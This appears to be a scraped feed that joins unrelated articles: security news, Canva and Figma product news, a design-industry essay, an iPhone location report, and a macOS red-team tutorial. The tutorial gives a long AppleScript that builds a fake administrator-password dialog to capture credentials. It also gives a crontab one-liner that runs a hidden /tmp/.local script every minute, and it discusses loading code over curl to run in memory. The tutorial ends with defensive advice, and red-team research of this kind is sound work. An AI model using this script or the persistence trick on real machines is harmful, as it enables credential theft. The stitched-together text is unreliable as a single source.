The Good, the Bad and the Ugly in Cybersecurity – Week 49

Image of The Good, The Bad & The Ugly in CyberSecurity

The Good

Strong coordinated action was apparent this week when an international law enforcement operation targeted the sellers and users of the Imminent Monitor Remote Access Trojan (IM-RAT). The operation was led by the Australian Federal Police (AFP), with international activity coordinated by Europol and Eurojust, and resulted in disabling IM-RAT, which was used across 124 countries and sold to more than 14,500 buyers. IM-RAT can no longer be used by those who bought it. This insidious RAT, which was able to disable anti-virus, record keystrokes, steal data and passwords and watch the victims via their webcams, was sold for as little as $25 (!!!) per license. The takedown netted the developer, an IM-RAT employee and 13 of the most prolific users of this Remote Access Trojan (RAT), spanning the entire globe – Australia, Colombia, Czechia, the Netherlands, Poland, Spain, Sweden and the United Kingdom.

In what might turn out to be the biggest news in cybercrime of 2019, the FBI and US DoJ have named two individuals, Maksim Yakubets and Igor Turashev, as being behind the ‘Evil Corp’ hacking group responsible for distributing the Dridex banking trojan. Authorities have offered an unprecedented US $5m reward for information leading to the arrest of Yakubets, who is also thought to be behind the notorious Zeus banking malware. Yakubets is widely believed to be hiding in Russia, so prospects of an arrest any time soon remain slim.

image of tweet Dridex hacker reward

The Bad

A targeted ransomware attack has hit one of America’s largest data center providers, CyrusOne, with the REvil (Sodinokibi) ransomware. Unlike other ransomware attacks that hit US entities this week –  like the very “evil” attack that hit the Shakespeare Theatre in Madison causing it to cancel Wednesday night’s performance of Charles Dickens’ “A Christmas Carol” –  the CyrusOne attack is more significant since it immediately impacts several downstream entities. The company’s initial assessment found that six MSPs (Managed Service Providers) suffered denial of service issues. Attacks that target service providers, often thought to have better security than smaller, less-technical companies, are more sophisticated and in the long run can proliferate and impact many client organizations.

image of cyrusone ransomware attack

The Ugly

This week, Kremlin critic Ben Bradshaw (UK, Labour Party) claimed he was the target of a Russian cyber-attack after receiving a suspicious email from Moscow. According to a news story in the Guardian, the email – supposedly from a Russian whistleblower – contained a number of documents that appeared to be genuine. The files showed how the Kremlin had set up a secret “fake news unit” to suppress negative stories and boost pro-government sentiment in its far east region. The Guardian reported that Bradshaw had sent the documents to “cyber experts” for analysis and that they had confirmed two of the documents carried malicious code. However, subsequent analysis by the UK’s National Cyber Security Centre (NCSC) appears to have failed to find anything malicious.

image of Ben Bradshaw tweet

Bradshaw himself seems to believe the email may have been just the opening shot in an attempt at gaining trust, and that his vigilance may have prevented a subsequent spear-phishing attack. We’d certainly agree with the need for caution when dealing with email attachments, by far the most common vector of malware infections for both individuals and organizations. Whether the British politician was really targeted or not, there’s no doubt that increasing meddling in political affairs through cybercrime is the ugly price of today’s wired world. Those tasked with protecting the integrity of the US 2020 election should be watching closely how the UK 2019 election unfolds.

 


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Canva introduces video editing, has big plans for 2020

Canva, the design company with nearly $250 million in funding, has today announced a variety of new features, including a video editing tool.

The company has also announced Canva Apps, which allows developers and customers alike to build on top of Canva. Thus far, Dropbox, Google Drive, PhotoMosh and Instagram are already in the Canva Apps suite, with a total of 30 apps available at launch.

The video editing tool allows for easy editing with no previous experience required, and also offers video templates, access to a stock content library with videos, music, etc. and easy-to-use animation tools.

Meanwhile, Canva is taking the approach of winning customers when they’re young, with the launch of Canva for Education. It’s a totally free product that has launched in beta with Australian schools, integrating with GSuite and Google Classroom to allow students to build out projects, and teachers to mark them up and review them.

Canva has also announced the launch of Canva for Desktop.

As design becomes more important to the way every organization functions and operates, one of the only barriers to the growth of the category is the pace at which new designers can emerge and enter the workforce.

Canva has positioned itself as the non-designer’s design tool, making it easy to create something beautiful with little to no design experience. The launch of the video editing tool and Canva for Education strengthen that stance, not only creating more users for the platform itself but fostering an environment for the maturation of new designers to join the ecosystem as a whole.

Alongside the announcement, Canva CEO Melanie Perkins has announced that Canva will join the 1% pledge, dedicating 1% of equity, profit, time and resources to making the world a better place.

Here’s what she had to say about it, in a prepared statement:

Companies have a huge role to play in helping to shape the world we live in and we feel like the 1% Pledge is an incredible program which will help us to use our company’s time, resources, product and equity to do just that. We believe the old adage ‘do no evil’ is no longer enough today and hope to live up to our value to ‘Be a Force for Good’.

Interestingly, Canva’s position at the top of the design funnel hasn’t slowed growth. Indeed, Canva recently launched Canva for Enterprise to let all the folks in the organization outside of the design department step up to bat and create their own decks, presentations, materials, etc., all within the parameter’s of the design system and brand aesthetic.

A billion designs have been created on Canva in 2019, with 2 billion designs created since the launch of the platform.

macOS Red Team: Calling Apple APIs Without Building Binaries

In the previous post on macOS red teaming, we set out to create a post-exploitation script that could automate searching for privileged apps on a target’s Mac and generate a convincing-looking authorization request dialog box to steal the user’s password. We also want our script to be able to monitor for use of the associated app so that it can trigger the spoofing attempt at an appropriate time to maximize success. In this post, we’ll continue developing our script, explore the wider case for taking an interest in AppleScript from a security angle, and conclude with some notes on mitigation and education.

image of calling apple apis

From last time, we have got as far as enumerating any Privileged Helper Tools, finding their parent applications, grabbing the associated icon and producing a reasonably credible-looking dialog box. My incomplete version of the script so far looks something like this:

#######################
-->> IMPORT STATEMENTS
#######################

use AppleScript version "2.4" -- Yosemite (10.10) or later
use scripting additions
use framework "Foundation"

#  classes, constants, and enums used
property NSString : a reference to current application's NSString
property NSFileManager : a reference to current application's NSFileManager
property NSWorkspace : a reference to current application's NSWorkspace

set NSDirectoryEnumerationSkipsHiddenFiles to a reference to 4
set NSFileManager to a reference to current application's NSFileManager
set NSDirectoryEnumerationSkipsPackageDescendants to a reference to 2


#######################
-->> PLAIN TEXT CONSTANTS
#######################

-- we can use some encoding on these plain text strings later if we want to make detection more difficult

set defaultIconName to "AppIcon"
set defaultIconStr to "/System/Library/CoreServices/Software Update.app/Contents/Resources/SoftwareUpdate.icns"
set resourcesFldr to "/Contents/Resources/"
set pht to "/Library/PrivilegedHelperTools"
set iconExt to ".icns"
set makeChanges to " wants to make changes."
set privString to "Enter the Administrator password for "
set allowThis to " to allow this."
set software_update_icon to ""

#######################
-->> GLOBALS & PROPERTIES
#######################
(*
tba
*)

#######################
-->> GENERAL HELPER HANDLERS
#######################

on removeWhiteSpace:aString
	set theString to current application's NSString's stringWithString:aString
	set theWhiteSet to current application's NSCharacterSet's whitespaceAndNewlineCharacterSet()
	set theString to theString's stringByTrimmingCharactersInSet:theWhiteSet
	return theString
end removeWhiteSpace:

on removePunctuation:aString
	set theString to current application's NSString's stringWithString:aString
	set thePuncSet to current application's NSCharacterSet's punctuationCharacterSet()
	set theString to theString's stringByTrimmingCharactersInSet:thePuncSet
	return theString
end removePunctuation:

on getSubstringFromIndex:anIndex ofString:aString
	set s_String to NSString's stringWithString:aString
	return s_String's substringFromIndex:anIndex
end getSubstringFromIndex:ofString:

on getSubstringToIndex:anIndex ofString:aString
	set s_String to NSString's stringWithString:aString
	return s_String's substringToIndex:anIndex
end getSubstringToIndex:ofString:

on getSubstringFromCharacter:char inString:source_string
	set s_String to NSString's stringWithString:source_string
	set find_char to NSString's stringWithString:char
	set rangeOf to s_String's rangeOfString:char
	return s_String's substringFromIndex:(rangeOf's location)
end getSubstringFromCharacter:inString:

on getSubstringToCharacter:char inString:source_string
	set s_String to NSString's stringWithString:source_string
	set find_char to NSString's stringWithString:char
	set rangeOf to s_String's rangeOfString:char
	return s_String's substringToIndex(rangeOf's location)
end getSubstringToCharacter:inString:

on getOffsetOfLastOccurenceOf:target inString:source
	set astid to AppleScript's text item delimiters
	set AppleScript's text item delimiters to target
	try
		set ro to (count source) - (count text item -1 of source)
	on error errMsg number errNum
		display dialog errMsg
		set AppleScript's text item delimiters to astid
		return ro - (length of target) + 1
	end try
end getOffsetOfLastOccurenceOf:inString:

on getShortAppName:longAppName
	try
		set longName to NSString's stringWithString:longAppName
		set lastIndex to my getOffsetOfLastOccurenceOf:"." inString:longAppName
		set shorter to my getSubstringToIndex:(lastIndex - 1) ofString:longName
		set shortest to shorter's lastPathComponent()
	on error
		# log "didn't get short name for " & longName
		return longAppName
	end try
	return shortest as text
end getShortAppName:

on enumerateFolderContents:aFolderPath
	set folderItemList to "" as text
	set nsPath to current application's NSString's stringWithString:aFolderPath
	--- Expand Tilde & Symlinks (if any exist) ---
	set nsPath to nsPath's stringByResolvingSymlinksInPath()
	--- Get the NSURL ---
	set folderNSURL to current application's |NSURL|'s fileURLWithPath:nsPath
	
	set theURLs to (NSFileManager's defaultManager()'s enumeratorAtURL:folderNSURL includingPropertiesForKeys:{} options:((its NSDirectoryEnumerationSkipsPackageDescendants) + (get its NSDirectoryEnumerationSkipsHiddenFiles)) errorHandler:(missing value))'s allObjects()
	set AppleScript's text item delimiters to linefeed
	try
		set folderItemList to ((theURLs's valueForKey:"path") as list) as text
	end try
	return folderItemList
end enumerateFolderContents:

on getIconFor:thePath
	set aPath to NSString's stringWithString:thePath
	set bundlePath to current application's NSBundle's bundleWithPath:thePath
	set theDict to bundlePath's infoDictionary()
	set iconFile to theDict's valueForKeyPath:(NSString's stringWithString:"CFBundleIconFile")
	if (iconFile as text) contains ".icns" then
		set iconFile to iconFile's stringByDeletingPathExtension()
	end if
	return iconFile
end getIconFor:

on getAppForBundleID:anID
	set allApps to paragraphs of (do shell script my lsappinfo)
	repeat with apps in allApps
		if apps contains anID then
			set appStr to (NSString's stringWithString:apps)
			set subst to (my getSubstringFromCharacter:""" inString:appStr)
			set subst to (my removeWhiteSpace:subst)
			set subst to (my removePunctuation:subst)
			try
				set bundlePath to (NSWorkspace's sharedWorkspace's absolutePathForAppBundleWithIdentifier:subst)
				if bundlePath is not missing value then
					set o to (my getOffsetOfLastOccurenceOf:"/" inString:(bundlePath as text))
					set appname to (my getSubstringFromIndex:o ofString:bundlePath)
					if appname is not missing value then
						return appname as text
					else
						return bundlePath as text
					end if
				end if
			end try
			return subst as text
		else
			-- do nothing
		end if
	end repeat
end getAppForBundleID:

on getPrivilegedHelperTools()
	return its enumerateFolderContents:(my pht)
end getPrivilegedHelperTools

on getPrivilegedHelperPaths()
	set helpers to paragraphs of its getPrivilegedHelperTools()
	set toolNames to {}
	repeat with n from 1 to count of helpers
		set this_helper to item n of helpers
		-- convert AS text to NSString
		set nsHlpr to (NSString's stringWithString:this_helper)
		-- now we can use NSString API to separate the path components
		set helperName to nsHlpr's lastPathComponent()
		set end of toolNames to {name:helperName as text, path:this_helper}
	end repeat
	return toolNames
end getPrivilegedHelperPaths

set helpers to my getPrivilegedHelperPaths()
set helpers_and_apps to {}
repeat with hlpr in helpers
	set bundleID to missing value
	set idString to missing value
	try
		set this_hlpr to hlpr's path
		set idString to (do shell script "launchctl plist __TEXT,__info_plist " & this_hlpr & " | grep -A1 AuthorizedClients") as text
	end try
	if idString is not missing value then
		set nsIDStr to (NSString's stringWithString:idString)
		set sep to (NSString's stringWithString:"identifier ")
		set components to (nsIDStr's componentsSeparatedByString:sep)
		if (count of components) is 2 then
			set str to item 2 of components
			-- some sanitization:
			set str to (my removeWhiteSpace:str)
			set str to (my (its removePunctuation:str))
			set str to (str's stringByReplacingOccurrencesOfString:""" withString:"")
			set bundleID to (str's componentsSeparatedByString:" ")'s item 1
			set bundlePath to (NSWorkspace's sharedWorkspace's absolutePathForAppBundleWithIdentifier:bundleID)
		end if
		if bundleID is not missing value then
			set end of helpers_and_apps to {parent:bundleID as text, path:bundlePath as text, helperName:hlpr's name as text, helperpath:hlpr's path}
		end if
	end if
end repeat

set helpersCount to count of helpers_and_apps
if helpersCount is greater than 0 then
	# 			-- choose one at random
	set n to (random number from 1 to helpersCount) as integer
	set chosenHelper to item n of helpers_and_apps
	set hlprName to chosenHelper's helperName
	set parentName to chosenHelper's path
	set shortName to my getShortAppName:(parentName as text)
	-- set the default icon in case next command fails
	set my software_update_icon to POSIX file (my defaultIconStr as text)
	-- try to get the current helper apps icon
	try
		set iconName to my getIconFor:parentName
		set my software_update_icon to POSIX file (parentName & my resourcesFldr & (iconName as text) & iconExt)
	end try
	-- let's get the user name from Foundation framework:
	set userName to current application's NSUserName()
	display dialog hlprName & my makeChanges & return & my privString & userName & my allowThis default answer "" with title shortName default button "OK" with icon my software_update_icon as «class furl» with hidden answer
end if

Choosing an Execution Method

One of AppleScript’s great versatilities is the sheer variety of ways that you can execute it. This is a topic I will explore further another time, but for now let’s simply list the ways. Aside from running your script in a Script Editor – something you’d likely never do other than during development – you can run AppleScript code from Services workflows, Mail Rules, Folder Actions, Droplets, and a bunch of third party utilities to boot. You can export your script as an application directly from the Script Editor, complete with its own Resources folder and icon, and you can even codesign it right there, too. 

image of export script as app

But perhaps the most versatile – and stealthy – way of all is simply to save your script as plain text with an osascript shebang at the top. That will allow you to call it from the command line, with no pre-compilation necessary at all. Try this simple experiment in your favorite text or code editor:

#!/usr/bin/osascript
use framework "Foundation"
property NSWorkspace : a reference to current application's NSWorkspace
set isFront to NSWorkspace's sharedWorkspace's frontmostApplication's localizedName as text

If your editor has the ability to run code directly (e.g, in BBEdit you can execute the contents of the front window with Command-R), run it now and note the result. Otherwise, save the file and run it from the command line.

image of run in bbedit
Of course, it returns the code editor itself since that is the frontmost app when you execute it. If we save the file as ‘frontmost_app’ without a file extension and run it from the Terminal, no prizes for guessing what’s returned, as the Terminal is now the frontmost app:

image of run in terminal
This may seem trivial, but it’s actually quite consequential. Until relatively recently, if you wanted to call Apple’s Carbon or Cocoa APIs on a Mac, you needed to build your code and compile it into a Mach-O binary. Of course, you don’t need a Mach-O if you want to run Bash shell commands, but then you can’t access the powerful Cocoa and Foundation APIs from that kind of shell script either. 

The problem with binaries, though, particularly on Mojave and Catalina, is that they can be scanned for strings and byte sequences, subjected to codesigning and notarization checks, and typically are written to disk where they can be detected by AV suites and other security tools. Wouldn’t it be nice if there was a way of executing native API code without all those security hurdles to get past? Wouldn’t it be nice if we could execute that code in memory?

On that point, the recent discovery of a “fileless” macOS malware that builds and executes a binary in memory using the native NSCreateObjectFileImageFromMemory and NSLinkModule caused a bit of a stir this week, although it’s not the first time this technique has been seen in the wild. However, with AppleScript/Objective C, we can get the power of Cocoa and Foundation APIs without building a binary at all. And since we can execute our scripts containing AppleScript/Objective C from plain, uncompiled text, that means we can CURL out to a remote server to download and then execute our “malicious” AppleScript/Objective C code in memory, too, without ever touching the file system. 

At this point, it’s probably worth pointing out that AppleScript isn’t the only way you can do this. There is also JavaScript for Automation (JXA), a 3rd party Python/Objective C (PyObjC) and even Swift can be used as a scripting language. However, to my mind AppleScript/Objective C is more stable and mature than JXA, less obvious than Python and doesn’t require external dependencies, while also substantially easier to develop than Swift scripts. That doesn’t mean these alternatives aren’t worth our attention another day, though!

But wait…Why Not Use ‘Vanilla’ AppleScript?

Let’s return to our Proof-of-Concept script that we began in the previous post. Our little NSWorkspace code snippet above will come in handy as one of the tasks we have to implement is watching for the app that we have chosen to spoof becoming active. This will be an ideal time to socially engineer the user and see if we can catch our target off guard and grab their credentials. 

Old school AppleScripters will know that we can use a short snippet of what is sometimes called “vanilla” AppleScript code to tell us which app is “frontmost” without reaching out to Cocoa APIs like NSWorkspace. 

tell application "System Events"

set frontapp to POSIX path of (file of process 1 whose frontmost is true) as text

end tell

However, vanilla AppleScript is problematic on a few counts. One, AppleScript is much slower than Objective C; two, the System Events app itself is notoriously slow and sometimes buggy; three, on Catalina, Apple have put limits on what you can do with some of the Apple Events generated by AppleScript. As soon as you start trying to control applications with AppleScript you are at risk of triggering a user consent dialog. From WWDC 2019:

“…the user must consent before one app can use AppleScript or raw Apple Events to control the actions of another app. These consent prompts make it clear, which apps are acting under the influence of which other apps and give the user control over that automation.”

We can avoid these potentially noisy Apple Events by steering clear of interacting with other apps and utilities with vanilla AppleScript and sticking to a combination of Foundation and Cocoa APIs and calling out to native command line utilities where necessary. 

Finding the Right Time For Social Engineering

Our next obstacle is figuring out how to check for our target app becoming frontmost without our own code getting in the way and becoming frontmost when we execute it. The answer to that problem lies in deciding how we’re going to launch our POC script. 

As we’ve seen, there are many different contexts in which we can launch AppleScript code, but let’s assume here that we will execute our script from a plain text ASCII file. We can do that in any number of ways. From a parent bash or python script, or directly from osascript, and there are also a number of options in terms of watching for the application to come frontmost. Rather than recommend any in particular, I’ll refer you to this post on macOS persistence methods, which explains the various options for launching persistent code. For the sake of this example, I’m going to use a cron job because cron jobs are quick and easy to write and less visible to most users than, say, LaunchAgents and LaunchDaemons. 

We can insert a cron job to the user’s crontab without authorization or authentication. A simple echo will do, though beware that this particular way of doing it will overwrite any existing cron jobs the user may have:

$ echo '*/1    *    *    *    * /tmp/.local' | crontab -

This will cause whatever is located at /tmp/.local to execute once a minute, indefinitely. Of course, we place our POC script at just that location. Let’s expand our earlier snippet and test this mechanism to make sure it returns the application that the user is engaged with rather than our calling code:

image of frontmost app

Save this as /tmp/.local and execute the line above to install the crontab. Assuming you have no other cron jobs, you can safely do this on your own machine and remove the crontab later with 

$ crontab -r

Now, you might like to continue browsing for a minute or so before inspecting what’s inside the ~/front.out file. If all’s gone well, it should be the name of your browser, or whatever application you were using when the code triggered. 

The cron job will keep running the script and overwrite the last entry every minute until you either delete the crontab or remove the script at /tmp/.local

We now have a mechanism for watching for the user’s activity that should not trip any built-in macOS security mechanisms. We can now hook that up to our POC script so that whatever application has been chosen by the script to get spoofed is the one we watch out for.

Let’s add a repeat loop that calls a new handler, checkIfFrontmost:shortName.

image of add handler

You can now create the handler further up the script by adapting the code snippet we tested above to check and return true if the app name is the same as shortName, and false otherwise. Remember that shortName is being passed into the handler as an NSString, so deal with that as described in the previous post.

Password Capture and Confirmation

We now have pretty much everything in place: a means of enumerating trusted, authorized helper tools and their parent apps, a convincing dialog box with icon and appropriate title, and a means of determining when the user is engaged with our target app. Let’s add the code for dealing with the dialog box’s “OK” and “Cancel” buttons.

image of capture password

Here we repeat the request twice, and save the answer given in a list called answers. Later, we retrieve the last answer in the list, assuming that the user would have typed more carefully on the second request, as typically users believe a failed authorization is due to their own typing error. We also add some logic here in case the user decides to cancel out at any point. In that event, we throw another dialog saying the parent app “can’t continue”, and we then attempt to kill the process by getting its PID either from the app’s path or it’s bundle identifier. Again, note we could do this directly with vanilla AppleScript just by using a 

tell application "BBEdit" to quit

We could also use NSRunningApplication’s terminate API, but at risk of running into macOS security checks, it may be better to shell out and issue a kill command via do shell script. Here’s a quick and dirty handler for grabbing the PID that probably needs a bit more battle-testing.

image of getPidFor handler

Finally, I leave it as an exercise for the reader to decide on how best to write the password out to file. You could use vanilla AppleScript here, since it won’t involve interapplication communication, but there’s a perfectly good (faster, stabler) NSString writeToFile: API that you can use instead. Regardless of technique, consider the location carefully in light of Mojave’s and Catalina’s new user privacy restrictions. Our incomplete POC script will also require some further logic to stop the spoofing (remember that cron job is still firing!) once we’ve successfully captured the password.

Blue Teams and Mitigation Strategies

In this post and the previous post, I’ve tried to show how AppleScript can be leveraged as a “living off the land” utility in the hope of drawing attention to just how powerful this underused and underrated macOS technology really is.

While I find it unlikely that threat actors would use these techniques in the wild – in part, because threat actors already have well established techniques for acquiring privileges – I believe it is important that as security researchers we turn over every stone, look into every possibility and ask questions like “what if someone did this?” “how would we detect it?” “what should we do to prevent it?” I believe the onus is on us to know at least as much as our adversaries about how macOS technologies work and what can be done with them. 

On top of that, the ease (after a little practice!) with which sophisticated and powerful AppleScript/Objective C scripts can be built, modified and deployed can provide another useful tool for red teams looking for unexpected pay offs in their engagements. 

For mitigation strategies, aside from running demos of this kind of spoofing activity to educate users, defenders should look out for osascript in the processes list. There aren’t many legitimate users of osascript in organizations and those that there are should be easy to enumerate and monitor. AppleScript is very much like “the PowerShell of macOS”, only with much more power and much less scrutiny from the security community. Let’s make sure we, as defenders, know more about it than those with malicious intent.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Design may be the next entrepreneurial gold rush

Ten years ago, the vast majority of designers were working in Adobe Photoshop, a powerful tool with fine-tuned controls for almost every kind of image manipulation one could imagine. But it was a tool built for an analog world focused on photos, flyers and print magazines; there were no collaborative features, and much more importantly for designers, there were no other options.

Since then, a handful of major players have stepped up to dominate the market alongside the behemoth, including InVision, Sketch, Figma and Canva.

And with the shift in the way designers fit into organizations and the way design fits into business overall, the design ecosystem is following the same path blazed by enterprise SaaS companies in recent years. Undoubtedly, investors are ready to place their bets in design.

But the question still remains over whether the design industry will follow in the footprints of the sales stack — with Salesforce reigning as king and hundreds of much smaller startup subjects serving at its pleasure — or if it will go the way of the marketing stack, where a lively ecosystem of smaller niche players exist under the umbrella of a handful of major, general-use players.

“Deca-billion-dollar SaaS categories aren’t born everyday,” said InVision CEO Clark Valberg . “From my perspective, the majority of investors are still trying to understand the ontology of the space, while remaining sufficiently aware of its current and future economic impact so as to eagerly secure their foothold. The space is new and important enough to create gold-rush momentum, but evolving at a speed to produce the illusion of micro-categorization, which, in many cases, will ultimately fail to pass the test of time and avoid inevitable consolidation.”

I spoke to several notable players in the design space — Sketch CEO Pieter Omvlee, InVision CEO Clark Valberg, Figma CEO Dylan Field, Adobe Product Director Mark Webster, InVision VP and former VP of Design at Twitter Mike Davidson, Sequoia General Partner Andrew Reed and FirstMark Capital General Partner Amish Jani — and asked them what the fierce competition means for the future of the ecosystem.

But let’s first back up.

Past

Sketch launched in 2010, offering the first viable alternative to Photoshop. Made for design and not photo-editing with a specific focus on UI and UX design, Sketch arrived just as the app craze was picking up serious steam.

A year later, InVision landed in the mix. Rather than focus on the tools designers used, it concentrated on the evolution of design within organizations. With designers consolidating from many specialties to overarching positions like product and user experience designers, and with the screen becoming a primary point of contact between every company and its customers, InVision filled the gap of collaboration with its focus on prototypes.

If designs could look and feel like the real thing — without the resources spent by engineering — to allow executives, product leads and others to weigh in, the time it takes to bring a product to market could be cut significantly, and InVision capitalized on this new efficiency.

In 2012, came Canva, a product that focused primarily on non-designers and folks who need to ‘design’ without all the bells and whistles professionals use. The thesis: no matter which department you work in, you still need design, whether it’s for an internal meeting, an external sales deck, or simply a side project you’re working on in your personal time. Canva, like many tech firms these days, has taken its top-of-funnel approach to the enterprise, giving businesses an opportunity to unify non-designers within the org for their various decks and materials.

In 2016, the industry felt two more big shifts. In the first, Adobe woke up, realized it still had to compete and launched Adobe XD, which allowed designers to collaborate amongst themselves and within the organization, not unlike InVision, complete with prototyping capabilities. The second shift was the introduction of a little company called Figma.

Where Sketch innovated on price, focus and usability, and where InVision helped evolve design’s position within an organization, Figma changed the game with straight-up technology. If Github is Google Drive, Figma is Google Docs. Not only does Figma allow organizations to store and share design files, it actually allows multiple designers to work in the same file at one time. Oh, and it’s all on the web.

In 2018, InVision started to move up stream with the launch of Studio, a design tool meant to take on the likes of Adobe and Sketch and, yes, Figma.

Present

When it comes to design tools in 2019, we have an embarrassment of riches, but the success of these players can’t be fully credited to the products themselves.

A shift in the way businesses think about digital presence has been underway since the early 2000s. In the not-too-distant past, not every company had a website and many that did offered a very basic site without much utility.

In short, designers were needed and valued at digital-first businesses and consumer-facing companies moving toward e-commerce, but very early-stage digital products, or incumbents in traditional industries had a free pass to focus on issues other than design. Remember the original MySpace? Here’s what Amazon looked like when it launched.

In the not-too-distant past, the aesthetic bar for internet design was very, very low. That’s no longer the case.

Figma launches Auto Layout

Figma, the design tool maker that has raised nearly $83 million from investors such as Index Ventures, Sequoia, Greylock and Kleiner Perkins, has today announced a new feature called Auto Layout that takes some of the tedious reformatting out of the design process.

Designers are all too familiar with the problem of manually sizing content in new components. For example, when a designer creates a new button for a web page, the text within the button has to be manually sized to fit within the button. If the text changes, or the size of the button, everything has to be adjusted accordingly.

This problem is exacerbated when there are many instances of a certain component, all of which have to be manually adjusted.

Auto Layout functions as a toggle. When it’s on, Figma does all the adjusting for designers, making sure content is centered within components and that the components themselves adjust to fit any new content that might be added. When an item within a frame is re-sized or changed, the content around it dynamically adjusts along with it.

Auto Layout also allows users to change the orientation of a list of items from vertical to horizontal and back again, adjust the individual sizing of a component within a list or re-order components in a list with a single click.

It’s a little like designing on auto-pilot.

Auto Layout also functions within the component system, allowing designers to tweak the source of truth without detaching the symbol or content from it, meaning that these changes flow through to the rest of their designs.

Figma CEO Dylan Field said there was very high demand for this feature from customers, and hopes that this will allow design teams to move much faster when it comes to user testing and iterative design.

Alongside the launch, Figma is also announcing that it has brought on its first independent board member. Lynn Vojvodich joins Danny Rimer, John Lilly, Mamoon Hamid and Andrew Reed on the Figma board.

Vojvodich has a wealth of experience as an operator in the tech industry, serving as EVP and CMO at Salesforce.com. She was a partner at Andreesen Horowitz, and led her own company Take3 for 10 years. Vojvodich also serves on the boards of several large corporations, including Ford Motor Company, Looker and Dell.

“I’ve never brought on an investor that I haven’t heavily reference checked, both with companies that have had success and those who don’t,” said Field. “A good board can really help accelerate the company, but a challenging board can make it tough for companies to keep moving.”

Field added that, as conversations progressed with Vojvodich, she continually delivered value to the team with crisp answers and great insights, noting that her experience translates.

Apple Explains Mysterious iPhone 11 Location Requests

KrebsOnSecurity ran a story this week that puzzled over Apple‘s response to inquiries about a potential privacy leak in its new iPhone 11 line, in which the devices appear to intermittently seek the user’s location even when all applications and system services are individually set never to request this data. Today, Apple disclosed that this behavior is tied to the inclusion of a short-range technology that lets iPhone 11 users share files locally with other nearby phones that support this feature, and that a future version of its mobile operating system will allow users to disable it.

I published Tuesday’s story mainly because Apple’s initial and somewhat dismissive response — that this was expected behavior and not a bug — was at odds with its own privacy policy and with its recent commercials stating that customers should be in full control over what they share via their phones and what their phones share about them.

But in a statement provided today, Apple said the location beaconing I documented in a video was related to Ultra Wideband technology that “provides spatial awareness allowing iPhone to understand its position relative to other Ultra Wideband enabled devices (i.e. all new iPhone 11s, including the Pro and Pro Max).

Ultra-wideband (a.k.a UWB) is a radio technology that uses a very low energy level for short-range, high-bandwidth communications of a large portion of the radio spectrum without interfering with more conventional transmissions.

“So users can do things like share a file with someone using AirDrop simply by pointing at another user’s iPhone,” Apple’s statement reads. The company further explained that the location information indicator (a small, upward-facing arrow to the left of the battery icon) appears because the device periodically checks to see whether it is being used in a handful of countries for which Apple hasn’t yet received approval to deploy Ultra Wideband.

“Ultra Wideband technology is an industry standard technology and is subject to international regulatory requirements that require it to be turned off in certain locations,” the statement continues. “iOS uses Location Services to help determine if iPhone is in these prohibited locations in order to disable Ultra Wideband and comply with regulations. The management of Ultrawide Band compliance and its use of location data is done entirely on the device and Apple is not collecting user location data.”

Apple’s privacy policy says users can disable all apps and system services that query the user’s location all at once by toggling the main “Location Services” option to “off.” Alternatively, it says, users can achieve the same results by individually turning off all System Services that use location in the iPhone settings.

What prompted my initial inquiry to Apple about this on Nov. 13 was that the location services icon on the iPhone 11 would reappear every few minutes even though all of the device’s individual location services had been disabled.

“It is expected behavior that the Location Services icon appears in the status bar when Location Services is enabled,” Apple stated in their initial response. “The icon appears for system services that do not have a switch in Settings” [emphasis added].

Now we know more about at least one of those services. Apple says it plans to include the option of a dedicated toggle in System Services to disable the UWB activity in an upcoming update of its iOS operating system, although it didn’t specify when that option might be available.

The one head-scratcher remaining is that the new iPhone seems to check whether it’s in a country that allows UWB fairly frequently, even though the list of countries where this feature is not yet permitted is fairly small, and includes Argentina, Indonesia and Paraguay. A complete list of countries where iPhones can use UWB is here. The principal remaining concern may be that these periodic checks unnecessarily drain the iPhone 11’s battery.

It is never my intention to create alarm where none should exist; there are far too many real threats to security and privacy that deserve greater public attention and scrutiny from the news media. However, Apple does itself and its users no favors when it takes weeks to respond (or not, as my colleague Zack Whittaker at TechCrunch discovered) to legitimate privacy concerns, and then does so in a way that only generates more questions.

The Most Important Cyber Prediction for 2020 and Beyond: The Convergence of Speed

From a risk management standpoint, the cyber security threat landscape has jumped the shark. The ability to distinguish various threat motives, threat vectors and related impacts to an organization, its people, and its mission, has arguably devolved over the last 5 years. We’ve been playing Security Risk Theater for too long, and it is time to get down to brass tacks and identify what first things’ first actually looks like going forward in 2020. If we are not able to do this as a community of practitioners and leaders, the industry will be stuck in a seemingly endless state of entropy, chaos and risk.

feature image 2020 and beyond

There are times to reflect back upon the history of cybersecurity and learn from it, and this will always be the case. However, there are also times to abandon historical notions of lessons-learned and push forward into that great unknown whose precipice we are now upon. The perspective of this author, and indeed this author’s raison d’être from here on out, is to vocalize and mobilize, as clear and as loud as possible, that which is upon us and that which we must now solve together as a community. In short, we need nothing less than a willing, aware, and impassioned collective of leaders to embrace and expound upon a movement of hyper-awareness.

While there are myriad lenses through which to observe and articulate the thrust of this awareness movement, we will focus on just one for now, which I believe to be the most important:

The raw velocity of the threat landscape requires an even greater velocity of the cyber defensive landscape.

Forget About Threat Actor ‘Sophistication’

While there is much noise, FUD and dramatic dialogue about the sophistication of the threat landscape, I do not believe it is sophistication that has given the adversary the upper hand. In fact, the most severe destructive events of 2019 involved TTPs (Tactics, Techniques, Procedures) that were trivial in complexity or sophistication by any measure: reusing stolen passwords? Connecting to remotely accessible RDP services? Have a user click on a malicious Word document executing Visual Basic code? A website dropping malware in today’s flavor-of-the-month language?

As they have been for decades, these are the most trivial and universally understood means of attacking an organization or user to gain a foothold.

Oh, but what about the crazy sophisticated trojan payloads these days? From where I stand, they are no more sophisticated than they were nearly 20 years ago when I wrote a paper entitled Trojan Warfare Exposed, in which I highlighted the multitude of features available in the commodity SubSeven Trojan of the era. Well over 150 discrete features and capabilities that when compiled were still less than .5mb in size.

At the end of the day, malware is still doing malware things: gaining footholds, extracting passwords, evading and persisting, moving laterally, sniffing keystrokes, and helping criminals extort their victims.

But wait, you say, “we didn’t have ransomware back in 2000, did we?” If by ransomware you mean criminals extorting computer users for money, well, we did actually. And it was simply called a trojan, and hackers used trojans all the time to intimidate, extort and coerce their victims into taking actions or giving up information. A list of things hackers were doing in Y2K with trojans (taken from the above-linked paper):

    • Fake Windows Logon Script
    • Key-Loggers that send strokes to hacker’s email
    • The Matrix
    • Intimidation (do it or else)
    • FakeHelpDeskmessagebox
    • Simple trojan Chat box
    • WebCamSpy
